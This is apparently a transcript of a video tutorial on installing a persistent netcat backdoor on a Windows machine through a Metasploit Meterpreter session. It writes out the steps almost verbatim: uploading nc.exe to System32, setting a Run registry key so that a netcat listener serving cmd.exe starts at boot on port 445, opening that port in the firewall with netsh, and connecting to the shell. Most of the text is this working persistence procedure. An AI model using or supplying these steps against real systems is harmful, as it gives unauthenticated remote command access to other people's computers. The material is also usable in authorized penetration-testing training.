Welcome. In this video we are going to learn persistent netcat backdoor in Metasploit. Instead of looking up information on remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall. Let's open up terminal, type sessions. Here I already created session. We must upload a copy of netcat to the remote system. Type upload user/share Windows binaries nc.exe C Windows System 32. Here you can see that nc.exe file is uploaded in remote PC. We work with the registry to have netcat execute on startup and listen on port 445. We do this by editing the key hklm/software Microsoft Windows current version run. Type reg enum key -k hklm software Microsoft Windows current version run. Here you can see that there is no children's. Let's set nc. Type reg set value -k hklm software Microsoft Windows current version run -v nc-d with single quote C Windows System 32 nc.exe -ldp 445 -e cmd.exe. Here you can see that nc successfully set. Type reg query value -k hklm software Microsoft Windows current version run -v nc. We need to alter the system to allow remote connection through the firewall to our netcat backdoor. We open an interactive command prompt and use netsh command to make changes, as it is far less error prone than altering registry directly. Plus, the process shown should work across more versions of Windows, as a registry location and functions are highly version and the patch level dependent. Let's execute it. Type execute -f command -i. Type netsh firewall show op mode. We open up the port 445 in the firewall and double check it was set properly. Type netsh firewall add port opening TCP 445 service firewall enable all. Here you can see that netsh firewall add port opening TCP 445 service firewall enable all. Type netsh firewall show port opening. Here you can see that netsh firewall show port opening. So with that being completed, we will reboot the system and test out netcat shell. Using nc-v IP address command, you can get session. In a real-world situation, we would not be using such simple backdoor as this with no authentication or encryption. However, principle of this process remain the same for other changes to the system and other sorts of programs one might want to execute on startup. So that's it in this video on persistent netcat backdoor in meterpreter. Thank you for watching this video.